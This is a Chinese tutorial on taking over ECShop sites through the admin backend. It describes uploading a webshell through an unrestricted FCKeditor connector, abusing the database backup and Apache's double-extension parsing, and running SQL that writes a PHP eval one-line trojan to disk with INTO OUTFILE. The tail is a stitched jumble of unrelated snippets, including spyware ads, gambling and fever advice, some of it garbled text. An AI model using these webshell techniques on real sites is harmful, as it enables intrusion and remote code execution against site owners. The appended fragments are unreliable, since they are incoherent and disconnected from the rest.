*** 一:龙儿心发明的,版本未定,估计都行。
进入后台-系统设置-Flash播放器管理
可以上传任意文件。
[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.php]
*** 二:另外一种是利用ecshop后台的数据库备份功能
这里选择自定义备份,目的是使你备份出来的文件尽量的小,要是太大的话也很麻烦。
然后去前台留个言,内容是我们的一句话木马,接着在后台选择备份ecs_feedback这张表,就是存放留言的表,如图:
然后会显示备份成功。
但是ecshop备份的文件都强行会在你填的备份的名字后面加上.sql扩展名(元备份名我填的是l4yn3.php),如图。
这么做无非就是提高安全性,可是设计者忽略了一个问题,如果php是在apache下运行的,利用apache的文件解析漏洞这种方式形同虚设。
因为apache有个漏洞就是对文件名是1.php.sql这种形式,只要最后的文件扩展名是apache不能能解析的,他就会按照php文件来解析它,那在这里sql文件就是apache不能够解析的文件,那么他理所当然会把这个文件当作php文件来执行。
所以如果是apache+php的话,即使文件名变成了上面这样,也可以正常解析,你所需要做的就是点一下备份后的链接。
所以您看出来了,这种拿shell的方式是需要你的环境是apache+php的。而且还有个条件是GPC魔术转换不能开启,所以也很鸡肋。
*** 三:ecshop后台有一个功能是sql查询,如图:
其实感觉在一个管理系统的后台放这么个功能根本没用,有多少网站管理员有这么高的觉悟,会用这个?
不过也不错,便宜了我们小菜拿shell。
*** 就像phpmyadmin一样直接操作sql语句导出一句话木马拿shell。
语句如下:
show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '导出路径';
drop table if exists a;
很常规的语句。也许有人会问不知道网站路径怎么办,那要导出到哪呢?这里有一个技巧就是 use 数据库名; 这句话,其实在这个sql查询功能中默认用的数据库就是本网站的数据库,开发者设计的时候不会考虑你去use 其他的数据库,所以这里你用use 数据名库这句时,会产生一个警告,但并不影响sql的运行,却可以成功爆出网站的路径,多次测试均成功,如图:
手机上监控器app远程控制,手机监视另一方手机上软件免费下载假如您确实想要知道您的手机上是不是遭受监控,请试着下列方式: 1. 假如您推送信息或电話,请查验您的号的通讯纪录(通讯目录),看一下是不是...
乌云飘散,风铃安全这个白帽子队伍突然慌了。 2016年7月20日,是让 Snake 和黑色键盘此生都难以忘记的日子。 这一天,乌云平台宣布暂时关闭后,再也没有回来。四个月前,因为乌云而凝聚...
本系列文章报告了本身从产物司理到CEO的故事,本篇文章偏重回首了本身大学创业到入职产物司理的经验,从中总结了3点思考,与各人分享! 本系列文章,是阶段性的小我私家事情经验盘货。涵盖从入行做产物...
EVERESTHome2.00.327Beta(本人置顶推荐的检测软件)说明:EVEREST(原名AIDA32)一个测试软硬件系统信息的工具,它可以详细的显示出PC每一个方面。 如果只是大概的硬件型号...
topsec-dc搜索内容URL如下:Ubuntu Server 18.04域微信赌博输钱能要回来吗, effect, control);图1. Harbor项目的赞助商和使用企业 extends H...
发烧怎么办怎样退烧快(儿童发烧怎么办)儿童感冒发烧经常让家长不知所措,有的家长直接带着孩子去医院,有的家长马上给孩子吃退烧药。其实,孩子发烧有轻有重,需要根据具体的情况来处理孩子的发烧。那么,小孩吃退...